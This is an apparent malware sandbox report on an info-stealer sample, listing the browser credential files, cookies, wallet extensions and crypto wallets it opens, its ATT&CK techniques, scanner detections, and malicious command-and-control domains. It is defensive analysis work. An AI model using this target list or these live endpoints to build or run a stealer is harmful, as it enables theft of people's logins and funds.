              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\AFWAAFRXKO
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\AIXACVYBSB
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\CURQNKVOIX
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\KZWFNRXYKI
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\MNULNCRIYC
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: C:\Users\user\Documents\KATAXZVCPS
              Source: C:\Users\user\Desktop\661fW9gxDp.exe | Directory queried: number of queries: 1001 (list truncated in the report)
              Source: Yara match | File source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques listed by tactic; the number in parentheses is the report's count of matched signatures for that technique, techniques without a number were not matched)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
              Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223); Wi-Fi Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: Archive Collected Data (1); Data from Local System (31); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
              Antivirus, Machine Learning and Genetic Malware Detection: initial sample

              Source          | Detection | Scanner        | Label
              661fW9gxDp.exe  | 51%       | Virustotal     | (Browse)
              661fW9gxDp.exe  | 66%       | ReversingLabs  | Win32.Trojan.StealC
              661fW9gxDp.exe  | 100%      | Avira          | TR/Crypt.XPACK.Gen
              661fW9gxDp.exe  | 100%      | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              URLs

              Source                          | Detection | Scanner         | Label
              https://grannyejh.lat/k         | 100%      | Avira URL Cloud | malware
              https://grannyejh.lat/L         | 100%      | Avira URL Cloud | malware
              https://grannyejh.lat:443/apiy  | 100%      | Avira URL Cloud | malware
              https://grannyejh.lat/6         | 100%      | Avira URL Cloud | malware
              http://crl.microHM              | 0%        | Avira URL Cloud | safe
              Domains and IPs: contacted domains

              Name                            | IP            | Active  | Malicious | Antivirus Detection | Reputation
              grannyejh.lat                   | 104.21.64.80  | true    | false     |                     | high
              s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true    | false     |                     | high
              sweepyribs.lat                  | unknown       | unknown | false     |                     | high
              Contacted URLs

              Name                       | Malicious | Antivirus Detection | Reputation
              necklacebudi.lat           | false     |                     | high
              aspecteirs.lat             | false     |                     | high
              energyaffai.lat            | false     |                     | high
              https://grannyejh.lat/api  | false     |                     | high
              sweepyribs.lat             | false     |                     | high
              sustainskelet.lat          | false     |                     | high
              crosshuaht.lat             | false     |                     | high
              rapeflowwj.lat             | false     |                     | high
              grannyejh.lat              | false     |                     | high
              discokeyus.lat             | false     |                     | high
              URLs from memory and binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              https://duckduckgo.com/chrome_newtab | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://duckduckgo.com/ac/?q= | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://grannyejh.lat/6 | 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              https://grannyejh.lat/ | 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://grannyejh.lat/L | 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://ocsp.rootca1.amazontrust.com0: | 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5 | 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://www.ecosia.org/newtab/ | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208. | 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://ac.ecosia.org/autocomplete?q= | 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://grannyejh.lat/apit | 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://grannyejh.lat:443/api | 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://grannyejh.lat/k661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.microHM661fW9gxDp.exe, 00000000.00000003.1575776408.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://grannyejh.lat:443/apiy661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://support.mozilla.org/products/firefoxgro.all661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
Legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.64.80 | grannyejh.lat | United States | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578074
Start date and time: 2024-12-19 08:35:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 661fW9gxDp.exe (renamed because the original name is a hash value)
Original Sample Name: 18c608e128d658aef6e267668ddb68e2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 661fW9gxDp.exe, PID 7684 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:36:32 | API Interceptor | 9x Sleep call for process: 661fW9gxDp.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.64.80 | S6oj0LoSiL.exe | malicious | LummaC |
| file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS |
| file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig |
| rK0CtrtVrl.exe | malicious | LummaC, Stealc |
| CefJcYwgWs.exe | malicious | LummaC, Stealc |
| tdMnK5A1pe.exe | malicious | LummaC |
| 3DI3mOIlxE.exe | malicious | LummaC, Stealc |
| Lw1k8a7gQu.exe | malicious | LummaC |
